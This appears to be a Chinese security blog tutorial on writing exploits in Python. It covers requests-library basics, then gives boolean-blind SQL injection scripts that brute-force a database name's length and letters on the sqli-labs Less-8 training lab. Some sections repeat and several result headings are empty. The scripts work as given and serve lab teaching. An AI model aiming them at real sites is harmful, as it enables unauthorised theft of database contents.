机窝安全--用Python编写EXP

一、环境

1、python3

2、用到的模块requests

3、sqli-lab

二、requests模块应用

1、获取网页的内容

# coding=utf-8import requestsres=requests.get("http://192.168.1.129/html/1.html")print(res.content.decode("utf-8"))

2、获取头信息

3、获取提交的网址

print(res.headers)print(res.url)

运行结果：

{'Date': 'Tue, 04 Aug 2020 13:01:06 GMT', 'Server': 'Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45', 'Last-Modified': 'Sun, 31 May 2020 15:48:24 GMT', 'ETag': '"676-5a6f39bc391c0"', 'Accept-Ranges': 'bytes', 'Content-Length': '1654', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html'}http://192.168.1.129/html/1.html

4、修改访问时UA信息

# coding=utf-8import requestsurl="http://192.168.1.129/html/1.html"header={"User-Agent":"aiyoubucuo"}res=requests.get(url,headers=header)print(res.request.headers)运行结果：{'User-Agent': 'aiyoubucuo', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

5、超时处理，网页超过三秒没有反应当做异常

# coding=utf-8import requestsurl="http://192.168.1.129/html/chaoshi.php"try: res=requests.get(url,timeout=3) print(res.request.headers)except Exception as e: print("网页已超时！！！")

6、提交get数据

# coding=utf-8import requestsurl="http://192.168.1.129/get.php"data={"aiyou":"bucuo"}res=requests.get(url,params=data)print(res.url)

运行结果：

http://192.168.1.129/get.php?aiyou=bucuo

7、POST提交数据

# coding=utf-8import requestsurl="http://192.168.1.129/post.php"datas={"aiyou":"bucuo"}res=requests.post(url,data=datas)print(res.content.decode("utf-8"))

运行结果：

array(1) { ["aiyou"]=> string(5) "bucuo"}

8、上传文件

# coding=utf-8import requestsurl="http://192.168.1.129/shangchuan.php"upfile={"file":open("123.txt","rb")}datas={"submit":"submit"}res=requests.post(url,files=upfile,data=datas)print(res.content.decode("utf-8"))

运行结果：

array(1) {
["aiyou"]=>
string(5) "bucuo"
}

8、上传文件

# coding=utf-8
import requests
url="http://192.168.1.129/shangchuan.php"
upfile={"file":open("123.txt","rb")}
datas={"submit":"submit"}
res=requests.post(url,files=upfile,data=datas)
print(res.content.decode("utf-8"))

运行结果：

三、获取数据库长度

#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=8' and (length(database())) = 8 --+
# coding=utf-8
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
dblen=0
while True:
    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
    print(dburl)
    if len(requests.get(dburl).text)==reslen:
        print("数据库名字长度为："+str(dblen))
        break
    if dblen==30:
        print("出现错误！")
        break
    dblen+=1

运行结果：

四、获取数据库名字

# coding=utf-8
import string
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=2' and (length(database())) = 8 --+
dblen=0
while True:
    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
    print(dburl)
    if len(requests.get(dburl).text)==reslen:
        print("数据库名字长度为："+str(dblen))
        break
    if dblen==30:
        print("出现错误！")
        break
    dblen+=1
dbnmae=""
#生成8个字母
for i in range(1,9):
    #获取字母从a-z
    for a in string.ascii_lowercase:
        dburl=url+"?id=1'+and+substr(database(),"+str(i)+",1)="+"'"+a+"'"+"--+"
        print(dburl)
        if len(requests.get(dburl).text)==reslen:
            dbnmae+=a
            print(dbnmae)
            break

运行结果：

评论

发表评论


顶	踩